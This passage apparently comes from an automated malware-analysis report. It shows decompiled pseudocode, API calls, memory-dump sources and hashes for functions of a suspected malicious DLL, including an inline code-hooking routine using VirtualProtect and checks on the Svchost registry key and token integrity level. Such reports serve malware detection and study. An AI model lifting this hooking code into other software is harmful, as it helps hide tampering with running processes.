				 *0x2ff1307c = _t11;
				 *(__p__fmode()) =  *0x2ff13068;
				 *(__p__commode()) =  *0x2ff13064;
				 *0x2ff1306c =  *_adjust_fdiv;
				E2FF11424();
				_t17 = E2FF11448();
				if( *0x2ff1300c == 0) {
					__setusermatherr(E2FF11448);
				}
				E2FF1144B(_t17);
				if( *0x2ff13008 == 0xffffffff) {
					__imp___configthreadlocale(0xffffffff);
				}
				return 0;
			}

0x2ff11360
0x2ff11367
0x2ff11420
0x2ff11420
0x2ff1136d
0x2ff1136d
0x2ff11372
0x2ff11372
0x2ff1137e
0x00000000
0x2ff11384
0x2ff11384
0x2ff1138e
0x2ff11e2f
0x00000000
0x2ff11e42
0x2ff11e42
0x00000000
0x2ff11e44
0x2ff11394
0x2ff11398
0x00000000
0x2ff1139e
0x2ff1139e
0x2ff113a0
0x2ff113a6
0x2ff113a9
0x2ff113a9
0x2ff11398
0x2ff1138e
0x2ff1137e
0x2ff113ad
0x2ff113b2
0x2ff113ba
0x2ff113c2
0x2ff113c7
0x2ff113d8
0x2ff113e6
0x2ff113ef
0x2ff113f4
0x2ff113f9
0x2ff11405
0x2ff11e54
0x2ff11e5a
0x2ff1140b
0x2ff11417
0x2ff11e62
0x2ff11e68
0x2ff1141f

APIs

__set_app_type.MSVCR90 ref: 2FF113B2
_encode_pointer.MSVCR90(000000FF), ref: 2FF113BA
__p__fmode.MSVCR90 ref: 2FF113CC
__p__commode.MSVCR90 ref: 2FF113DA

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: __p__commode__p__fmode__set_app_type_encode_pointer
String ID:
API String ID: 3439008642-0
Opcode ID: eae7f326e990a0fac09d69ef8b1328373294b610aecdf584ce588f80061840d7
Instruction ID: a10fb9ceacb31bdfc199cbc2360c0d50a8c0e7f5196db4e788c1c36cde79e303
Opcode Fuzzy Hash: eae7f326e990a0fac09d69ef8b1328373294b610aecdf584ce588f80061840d7
Instruction Fuzzy Hash: 75213E71900241DFEB188B66E08865737EABB05B75F12426AE216C77A9D73994A0CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0303139F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(?,?,000000C8,?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,?), ref: 030313D6
GetTempFileNameA.KERNELBASE(?,edg,00000000,?,?,?,000000C8,?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,?), ref: 030313EB
DeleteFileA.KERNELBASE(?,?,?,?,000000C8,?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,?), ref: 030313F2

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 030313B3
edg, xrefs: 030313DF

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: File$DeleteEnvironmentExpandNameStringsTemp
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$edg
API String ID: 3636227868-1338781389
Opcode ID: b5f9f29737cbafc32133e3845507062f1409a6222b5256ecdf913c1d6d46e760
Instruction ID: 1c4a8aab0c50133d24e0a0badc805991657ad12034f7713648357cf3616427a4
Opcode Fuzzy Hash: b5f9f29737cbafc32133e3845507062f1409a6222b5256ecdf913c1d6d46e760
Instruction Fuzzy Hash: C8F090B5903218BBE720FB66ED09FDF7B7CDB45610F0001A5F508D3140DB789B098AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0303268E, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 030326CB
dllmain_crt_dispatch.LIBCMT ref: 030326E2
dllmain_raw.LIBCMT ref: 0303272A
dllmain_crt_dispatch.LIBCMT ref: 0303273D
dllmain_raw.LIBCMT ref: 03032750

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 557c67f5aede589354ffdf093c21a576e2342f59a3342b95eafde1c5d555becb
Instruction ID: 120e8e3e31fb29825ede697c49b028905a9fe156aca27a118e2be5387a13c59d
Opcode Fuzzy Hash: 557c67f5aede589354ffdf093c21a576e2342f59a3342b95eafde1c5d555becb
Instruction Fuzzy Hash: CC218175D03315EBDB61EE55CC85AAF7ABDEF86A90F094915F8146B210C3304D428BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D86481E, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6D86481E(void* __edx, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t34;
				void* _t36;
				void* _t39;
				signed int _t40;
				signed int _t42;
				void* _t44;
				void* _t49;

				_t39 = __edx;
				E6D864EC0(0x6d875538, 0xc);
				_t40 =  *(_t44 + 0xc);
				if(_t40 != 0) {
					L3:
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					__eflags = _t40 - 1;
					if(_t40 == 1) {
						L6:
						_t34 =  *(_t44 + 0x10);
						_t42 = E6D864929( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *(_t44 - 0x1c) = _t42;
						__eflags = _t42;
						if(_t42 == 0) {
							L16:
							 *(_t44 - 4) = 0xfffffffe;
							_t24 = _t42;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
							return _t24;
						}
						_t25 = E6D864614(_t36, _t39,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
						_t42 = _t25;
						 *(_t44 - 0x1c) = _t42;
						__eflags = _t42;
						if(_t42 == 0) {
							goto L16;
						}
						L8:
						_push(_t34);
						_t26 = E6D861400( *((intOrPtr*)(_t44 + 8)), _t40); // executed
						_t42 = _t26;
						 *(_t44 - 0x1c) = _t42;
						__eflags = _t40 - 1;
						if(_t40 == 1) {
							__eflags = _t42;
							if(_t42 == 0) {
								_push(_t34);
								_t29 = E6D861400( *((intOrPtr*)(_t44 + 8)), _t26);
								__eflags = _t34;
								_t14 = _t34 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6D86476E(_t39, _t14);
								_pop(_t36);
								E6D864929( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
							}
						}
						__eflags = _t40;
						if(_t40 == 0) {
							L13:
							_t42 = E6D864614(_t36, _t39,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
							 *(_t44 - 0x1c) = _t42;
							__eflags = _t42;
							if(_t42 != 0) {
								_t42 = E6D864929( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
								 *(_t44 - 0x1c) = _t42;
							}
							goto L16;
						} else {
							__eflags = _t40 - 3;
							if(_t40 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t40 - 2;
					if(_t40 == 2) {
						goto L6;
					}
					_t34 =  *(_t44 + 0x10);
					goto L8;
				}
				_t49 =  *0x6d8c1074 - _t40; // 0x1
				if(_t49 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6d86481e
0x6d864825
0x6d86482a
0x6d86482f
0x6d864840
0x6d864840
0x6d864844
0x6d864847
0x6d864853
0x6d864853
0x6d864860
0x6d864862
0x6d864865
0x6d864867
0x6d864910
0x6d864910
0x6d864917
0x6d864919
0x6d86491c
0x6d864928
0x6d864928
0x6d864872
0x6d864877
0x6d864879
0x6d86487c
0x6d86487e
0x00000000
0x00000000
0x6d864884
0x6d864884
0x6d864889
0x6d86488e
0x6d864890
0x6d864893
0x6d864896
0x6d864898
0x6d86489a
0x6d86489c
0x6d8648a1
0x6d8648a6
0x6d8648a8
0x6d8648a8
0x6d8648ae
0x6d8648af
0x6d8648b4
0x6d8648ba
0x6d8648ba
0x6d86489a
0x6d8648bf
0x6d8648c1
0x6d8648c8
0x6d8648d2
0x6d8648d4
0x6d8648d7
0x6d8648d9
0x6d8648e5
0x6d86490d
0x6d86490d
0x00000000
0x6d8648c3
0x6d8648c3
0x6d8648c6
0x00000000
0x00000000
0x00000000
0x6d8648c6
0x6d8648c1
0x6d864849
0x6d86484c
0x00000000
0x00000000
0x6d86484e
0x00000000
0x6d86484e
0x6d864831
0x6d864837
0x00000000
0x00000000
0x6d864839
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6D86485B
dllmain_crt_dispatch.LIBCMT ref: 6D864872
dllmain_raw.LIBCMT ref: 6D8648BA
dllmain_crt_dispatch.LIBCMT ref: 6D8648CD
dllmain_raw.LIBCMT ref: 6D8648E0

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 80deac03cab6595b6fed0ab2f68c28dc61a0495b731434ce268750e10c36915c
Instruction ID: 99c3fcccf2652fcf88d33336516c8d3be4d5933bc55447c384fbaef5a8ff617f
Opcode Fuzzy Hash: 80deac03cab6595b6fed0ab2f68c28dc61a0495b731434ce268750e10c36915c
Instruction Fuzzy Hash: 6221B172D4C2DAAADB118F5DD858A7F3A79EBC9BB8F014915F91457224C3318D118BB0

Uniqueness

Uniqueness Score: -1.00%

Function 030315A1, Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,00000000), ref: 030315B8
OpenProcessToken.ADVAPI32(00000000), ref: 030315BF
GetTokenInformation.KERNELBASE(00000000,00000012(TokenIntegrityLevel),00000001,00000004,00000000), ref: 030315DC
FindCloseChangeNotification.KERNELBASE(00000000), ref: 030315E5

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
String ID:
API String ID: 2406157124-0
Opcode ID: c1eb92222d7efb02419a26ec1ee69d94e17f2fc769466664f6bf7fe1d0f610e5
Instruction ID: be73e7fb4a675a3ed1845268e52419a228ee5ab8fffee3ea345ba7c6c843a15e
Opcode Fuzzy Hash: c1eb92222d7efb02419a26ec1ee69d94e17f2fc769466664f6bf7fe1d0f610e5
Instruction Fuzzy Hash: 3BF012B5D11108FBDF00FBE1DA0ABDDB7BCAB09346F144065E202E1091D7748B14DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6D861150, Relevance: 6.0, APIs: 4, Instructions: 33
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D861150() {
				long _t7;
				signed int _t10;
				void* _t17;

				_t10 =  *0x6d8c13a0; // 0x11
				_t5 =  *0x6d8c1a7c; // 0x80000001
				if(_t5 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t10 * 4)) + 4))) {
					E6D8641C3(_t5, 0x6d8c1a7c);
					_t17 = _t17 + 4;
					if( *0x6d8c1a7c == 0xffffffff) {
						 *0x6d8c1a80 = GetTickCount();
						E6D864179(0x6d8c1a7c);
						_t17 = _t17 + 4;
					}
				}
				_t7 = GetTickCount();
				_t5 = _t7 -  *0x6d8c1a80;
				if(_t7 -  *0x6d8c1a80 >= 0x7530) {
					goto ( *0x6d8c1a78);
				} else {
					L3:
					Sleep(0x3e8); // executed
					goto L3;
				}
			}

0x6d861159
0x6d861169
0x6d861174
0x6d8611a6
0x6d8611ab
0x6d8611b5
0x6d8611be
0x6d8611c3
0x6d8611c8
0x6d8611c8
0x6d8611b5
0x6d861176
0x6d861178
0x6d861183
0x6d86119b
0x6d861185
0x6d861190
0x6d861195
0x00000000
0x6d861195

APIs

GetTickCount.KERNEL32 ref: 6D861176
Sleep.KERNELBASE(000003E8), ref: 6D861195
GetTickCount.KERNEL32 ref: 6D8611B7
__Init_thread_footer.LIBCMT ref: 6D8611C3

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$Init_thread_footerSleep
String ID:
API String ID: 3912859873-0
Opcode ID: 2245d31de74f23950dded8d1530a93d5d2bc1a873112d0b0c039b592b1ee82d8
Instruction ID: a6f84ffc5a6cc88b5540270d2607a6d375d8aeb8bdab803195baf70b62539800
Opcode Fuzzy Hash: 2245d31de74f23950dded8d1530a93d5d2bc1a873112d0b0c039b592b1ee82d8
Instruction Fuzzy Hash: 2DF06276C44699DFEB109BA9D88CA287774B70F370B054D66D61687E82CB35A900CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D8627D0, Relevance: 4.8, APIs: 3, Instructions: 319
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6D8627D0(void* __edi, signed char _a4, signed char _a8, signed char _a12, signed char _a16, signed char _a20) {
				signed char _v8;
				signed char _v12;
				void* _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed char _v32;
				signed char _v36;
				intOrPtr _v40;
				signed char _v44;
				signed char _v48;
				signed char _v52;
				signed char _v56;
				long _v60;
				signed char _v64;
				signed char _v68;
				void* __ebp;
				long _t172;
				signed char _t178;
				signed char _t180;
				signed char _t199;
				int _t201;
				signed char _t209;
				void* _t219;
				signed char _t222;
				signed char _t227;
				signed char _t251;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t307;

				_t304 = __edi;
				_v28 = 0;
				if(_a12 != 0) {
					 *_a12 = 0;
				}
				if(_a16 != 0) {
					 *_a16 = 0;
				}
				if(_a20 != 0) {
					 *_a20 = 0;
				}
				if(_a8 != 0) {
					_t172 = GetCurrentThreadId();
					__eflags =  *0x6d8c1014 - _t172;
					if( *0x6d8c1014 == _t172) {
						__eflags =  *0x6d8c1018;
						if( *0x6d8c1018 == 0) {
							__eflags = _a4;
							if(_a4 != 0) {
								__eflags =  *_a4;
								if( *_a4 != 0) {
									_v16 =  *_a4;
									_v8 = 0;
									_v20 = 0;
									_v16 = E6D862BF0(_v16, 0);
									_a8 = E6D862BF0(_a8, 0);
									__eflags = _a8 - _v16;
									if(_a8 != _v16) {
										__eflags = _a16;
										if(_a16 != 0) {
											 *_a16 = _v16;
										}
										__eflags = _a20;
										if(__eflags != 0) {
											 *_a20 = _a8;
										}
										_push(0x18);
										_t178 = E6D864299(__eflags);
										_t306 = _t305 + 4;
										_v64 = _t178;
										_v20 = _v64;
										__eflags = _v20;
										if(_v20 != 0) {
											_t180 = E6D861840(_t304, _v16); // executed
											_t307 = _t306 + 4;
											_v8 = _t180;
											__eflags = _v8;
											if(_v8 != 0) {
												__eflags = _a12;
												if(_a12 != 0) {
													 *_a12 = _v8;
												}
												E6D865880(_t304, _v8 + 0x38, 0, 8);
												_t307 = _t307 + 0xc;
												_v32 = _v16;
												_v12 = _v8;
												_t237 = _v12 + 0x1e;
												__eflags = _t237;
												_v44 = _t237;
												_v24 = 0;
												_v40 = 5;
												_v36 = 0;
												while(1) {
													__eflags = _v24 - _v40;
													if(__eflags >= 0) {
														goto L44;
													}
													_v52 = _v32;
													_v48 = 0;
													_v32 = E6D864050(__eflags, _v12,  &_v44, _v32, 0,  &_v48);
													_v12 = _v32 - _v52 + _v48 + _v12;
													_v24 = _v32 - _v16;
													 *(_v8 + _v36 + 0x38) =  *(_v8 + _v36 + 0x38) & 0x000000f8 | _v24 & 0x00000007;
													_t219 = _v8 + _v36;
													_t237 =  *(_t219 + 0x38) & 0x00000007 | (_v12 - _v8 & 0x0000001f) << 0x00000003;
													 *(_v8 + _v36 + 0x38) =  *(_t219 + 0x38) & 0x00000007 | (_v12 - _v8 & 0x0000001f) << 0x00000003;
													_v36 = _v36 + 1;
													__eflags = _v36 - 8;
													if(_v36 < 8) {
														_t237 = _v52;
														_t222 = E6D861A70(_v52);
														_t307 = _t307 + 4;
														__eflags = _t222;
														if(_t222 == 0) {
															continue;
														}
														while(1) {
															L44:
															__eflags = _v24 - _v40;
															if(_v24 >= _v40) {
																break;
															}
															_t209 = E6D861DE0(_v32);
															_t307 = _t307 + 4;
															_v56 = _t209;
															__eflags = _v56;
															if(_v56 != 0) {
																_t237 = _v32 + _v56;
																_v32 = _v32 + _v56;
																_v24 = _v32 - _v16;
																continue;
															}
															break;
														}
														__eflags = _v24 - _v40;
														if(_v24 < _v40) {
															L50:
															_v28 = 9;
															__eflags =  *0x6d8c100c;
															if( *0x6d8c100c == 0) {
																goto L26;
															}
															goto L27;
														}
														__eflags = _v36 - 8;
														if(_v36 <= 8) {
															__eflags = _v12 - _v44;
															if(_v12 > _v44) {
																asm("int3");
															}
															 *(_v8 + 0x1e) = _v12 - _v8;
															 *((char*)(_v8 + 0x36)) = _v24;
															E6D8659E0(_v8 + 0x20, _v16, _v24);
															_t307 = _t307 + 0xc;
															__eflags = _v24 - 0x1e - _v40;
															if(_v24 <= 0x1e - _v40) {
																 *((intOrPtr*)(_v8 + 0x40)) = _v16 + _v24;
																 *(_v8 + 0x44) = _a8;
																_v12 = ( *(_v8 + 0x1e) & 0x000000ff) + _v8;
																_v12 = E6D861DA0(_v8, _v12,  *((intOrPtr*)(_v8 + 0x40)));
																_t199 = E6D861D70(_v12, _v44);
																_t307 = _t307 + 0x10;
																_v12 = _t199;
																_v60 = 0;
																_t201 = VirtualProtect(_v16, _v24, 0x40,  &_v60); // executed
																__eflags = _t201;
																if(_t201 != 0) {
																	 *(_v20 + 4) = 0;
																	 *(_v20 + 8) = _a4;
																	 *(_v20 + 0x10) = _v8;
																	 *(_v20 + 0xc) = _v16;
																	 *((intOrPtr*)(_v20 + 0x14)) = _v60;
																	_t251 =  *0x6d8c1024; // 0x0
																	 *_v20 = _t251;
																	 *0x6d8c1024 = _v20;
																	__eflags = 0;
																	return 0;
																}
																_v28 = GetLastError();
															} else {
																_v28 = 6;
															}
															goto L26;
														}
														goto L50;
													}
													goto L44;
												}
												goto L44;
											}
											_v28 = 8;
											goto L26;
										} else {
											_v28 = 8;
											L26:
											_t237 = _v28;
											 *0x6d8c1018 = _v28;
											L27:
											__eflags = _v8;
											if(_v8 != 0) {
												E6D861CC0(_t237, _v8);
												_t307 = _t307 + 4;
												_v8 = 0;
												__eflags = _a12;
												if(_a12 != 0) {
													 *_a12 = 0;
												}
											}
											__eflags = _v20;
											if(_v20 != 0) {
												_v68 = _v20;
												L6D864090(_v68);
												_v20 = 0;
											}
											 *0x6d8c101c = _a4;
											return _v28;
										}
									}
									__eflags =  *0x6d8c100c;
									if( *0x6d8c100c == 0) {
										goto L26;
									}
									goto L27;
								}
								_v28 = 6;
								 *0x6d8c1018 = _v28;
								 *0x6d8c101c = _a4;
								return _v28;
							}
							return 6;
						}
						_t227 =  *0x6d8c1018; // 0x0
						return _t227;
					}
					return 0x10dd;
				} else {
					return 0x57;
				}
			}

0x6d8627d0
0x6d8627d6
0x6d8627e1
0x6d8627e6
0x6d8627e6
0x6d8627f0
0x6d8627f5
0x6d8627f5
0x6d8627ff
0x6d862804
0x6d862804
0x6d86280e
0x6d86281a
0x6d86281f
0x6d862825
0x6d862831
0x6d862838
0x6d862844
0x6d862848
0x6d862857
0x6d86285a
0x6d862882
0x6d862885
0x6d86288c
0x6d86289e
0x6d8628ac
0x6d8628b2
0x6d8628b5
0x6d8628ca
0x6d8628ce
0x6d8628d6
0x6d8628d6
0x6d8628d8
0x6d8628dc
0x6d8628e4
0x6d8628e4
0x6d8628e6
0x6d8628e8
0x6d8628ed
0x6d8628f0
0x6d8628f6
0x6d8628f9
0x6d8628fd
0x6d86296a
0x6d86296f
0x6d862972
0x6d862975
0x6d862979
0x6d862984
0x6d862988
0x6d862990
0x6d862990
0x6d86299d
0x6d8629a2
0x6d8629a8
0x6d8629ae
0x6d8629b4
0x6d8629b4
0x6d8629b7
0x6d8629ba
0x6d8629c1
0x6d8629c8
0x6d8629cf
0x6d8629d2
0x6d8629d5
0x00000000
0x00000000
0x6d8629de
0x6d8629e1
0x6d8629ff
0x6d862a0e
0x6d862a17
0x6d862a33
0x6d862a45
0x6d862a4e
0x6d862a56
0x6d862a5f
0x6d862a62
0x6d862a66
0x6d862a6a
0x6d862a6e
0x6d862a73
0x6d862a76
0x6d862a78
0x00000000
0x6d862a7c
0x6d862a81
0x6d862a81
0x6d862a84
0x6d862a87
0x00000000
0x00000000
0x6d862a8d
0x6d862a92
0x6d862a95
0x6d862a98
0x6d862a9c
0x6d862aa3
0x6d862aa6
0x6d862aaf
0x00000000
0x6d862aaf
0x00000000
0x6d862a9e
0x6d862ab7
0x6d862aba
0x6d862ac2
0x6d862ac2
0x6d862ac9
0x6d862ad0
0x00000000
0x6d862ad9
0x00000000
0x6d862ad2
0x6d862abc
0x6d862ac0
0x6d862ae1
0x6d862ae4
0x6d862ae6
0x6d862ae6
0x6d862af0
0x6d862af9
0x6d862b0b
0x6d862b10
0x6d862b1b
0x6d862b1e
0x6d862b35
0x6d862b3e
0x6d862b4b
0x6d862b61
0x6d862b6c
0x6d862b71
0x6d862b74
0x6d862b77
0x6d862b8c
0x6d862b91
0x6d862b93
0x6d862ba5
0x6d862bb2
0x6d862bbb
0x6d862bc4
0x6d862bcd
0x6d862bd3
0x6d862bd9
0x6d862bde
0x6d862be4
0x00000000
0x6d862be4
0x6d862b9a
0x6d862b20
0x6d862b20
0x6d862b20
0x00000000
0x6d862b1e
0x00000000
0x6d862ac0
0x00000000
0x6d862a68
0x00000000
0x6d8629cf
0x6d86297b
0x00000000
0x6d8628ff
0x6d8628ff
0x6d862906
0x6d862906
0x6d862909
0x6d86290f
0x6d86290f
0x6d862913
0x6d862919
0x6d86291e
0x6d862921
0x6d862928
0x6d86292c
0x6d862931
0x6d862931
0x6d86292c
0x6d862937
0x6d86293b
0x6d862940
0x6d862947
0x6d86294f
0x6d86294f
0x6d862959
0x00000000
0x6d86295e
0x6d8628fd
0x6d8628b7
0x6d8628be
0x00000000
0x6d8628c6
0x00000000
0x6d8628c0
0x6d86285c
0x6d862866
0x6d86286f
0x00000000
0x6d862875
0x00000000
0x6d86284a
0x6d86283a
0x00000000
0x6d86283a
0x00000000
0x6d862810
0x00000000
0x6d862810

APIs

GetCurrentThreadId.KERNEL32 ref: 6D86281A

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: aec6a2d52a802f3a88c0da960712432daba671d9c497b942d5b4b2a7e22ce4c1
Instruction ID: 302cac7d0fc6f7de3afa45b941b3a1876926d5afa136dfa29728c1a6e749a26e
Opcode Fuzzy Hash: aec6a2d52a802f3a88c0da960712432daba671d9c497b942d5b4b2a7e22ce4c1
Instruction Fuzzy Hash: 69E107B4D0424ADFDB14CF98D998BEEBBB1FF48314F208599E914A7344D3789A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D867392, Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D867392(void* __ebx, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v40;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t59;
				void* _t62;
				intOrPtr _t63;
				intOrPtr* _t64;
				void* _t68;

				_push(_t35);
				_t33 = _a4;
				_t50 = 0;
				_t59 = _t33;
				_t14 =  *_t33;
				while(_t14 != 0) {
					if(_t14 != 0x3d) {
						_t50 = _t50 + 1;
					}
					_t36 = _t59;
					_t53 = _t36 + 1;
					do {
						_t15 =  *_t36;
						_t36 = _t36 + 1;
					} while (_t15 != 0);
					_t59 = _t59 + 1 + _t36 - _t53;
					_t14 =  *_t59;
				}
				_t3 = _t50 + 1; // 0x1
				_t54 = E6D868473(_t3, 4);
				if(_t54 == 0) {
					L19:
					_t54 = 0;
					goto L20;
				} else {
					_v8 = _t54;
					while(1) {
						_t51 =  *_t33;
						if(_t51 == 0) {
							break;
						}
						_t41 = _t33;
						_t62 = _t41 + 1;
						do {
							_t20 =  *_t41;
							_t41 = _t41 + 1;
						} while (_t20 != 0);
						_t21 = _t41 - _t62 + 1;
						_v12 = _t21;
						if(_t51 == 0x3d) {
							L15:
							_t33 = _t33 + _t21;
							continue;
						} else {
							_t22 = E6D868473(_t21, 1); // executed
							_t63 = _t22;
							if(_t63 == 0) {
								_push(_t54);
								L22();
								E6D867CC2(0);
								goto L19;
							} else {
								_t24 = E6D867AFB(_t63, _v12, _t33);
								_t68 = _t68 + 0xc;
								if(_t24 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t26 = E6D8669AE();
									asm("int3");
									_push(_t63);
									_t64 = _v40;
									if(_t64 != 0) {
										_t27 =  *_t64;
										_push(_t54);
										_t56 = _t64;
										while(_t27 != 0) {
											E6D867CC2(_t27);
											_t56 = _t56 + 4;
											_t27 =  *_t56;
										}
										_t26 = E6D867CC2(_t64);
									}
									return _t26;
								} else {
									_t29 = _v8;
									 *_t29 = _t63;
									_v8 = _t29 + 4;
									E6D867CC2(0);
									_t21 = _v12;
									goto L15;
								}
							}
						}
						goto L28;
					}
					L20:
					E6D867CC2(0);
					return _t54;
				}
				L28:
			}

0x6d867398
0x6d86739a
0x6d86739d
0x6d8673a1
0x6d8673a3
0x6d8673bf
0x6d8673a9
0x6d8673ab
0x6d8673ab
0x6d8673ac
0x6d8673ae
0x6d8673b1
0x6d8673b1
0x6d8673b3
0x6d8673b4
0x6d8673bb
0x6d8673bd
0x6d8673bd
0x6d8673c3
0x6d8673ce
0x6d8673d4
0x6d867444
0x6d867444
0x00000000
0x6d8673d6
0x6d8673d6
0x6d86742d
0x6d86742d
0x6d867431
0x00000000
0x00000000
0x6d8673db
0x6d8673dd
0x6d8673e0
0x6d8673e0
0x6d8673e2
0x6d8673e3
0x6d8673e9
0x6d8673ec
0x6d8673f2
0x6d86742b
0x6d86742b
0x00000000
0x6d8673f4
0x6d8673f7
0x6d8673fc
0x6d867402
0x6d867435
0x6d867436
0x6d86743d
0x00000000
0x6d867404
0x6d867409
0x6d86740e
0x6d867413
0x6d867457
0x6d867458
0x6d867459
0x6d86745a
0x6d86745b
0x6d86745c
0x6d867461
0x6d867467
0x6d867468
0x6d86746d
0x6d86746f
0x6d867471
0x6d867472
0x6d867482
0x6d867477
0x6d86747c
0x6d86747f
0x6d867481
0x6d867487
0x6d86748d
0x6d867490
0x6d867415
0x6d867415
0x6d86741a
0x6d86741f
0x6d867422
0x6d867427
0x00000000
0x6d86742a
0x6d867413
0x6d867402
0x00000000
0x6d8673f2
0x6d867446
0x6d867448
0x6d867454
0x6d867454
0x00000000

APIs

_free.LIBCMT ref: 6D867422
_free.LIBCMT ref: 6D86743D
_free.LIBCMT ref: 6D867448

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
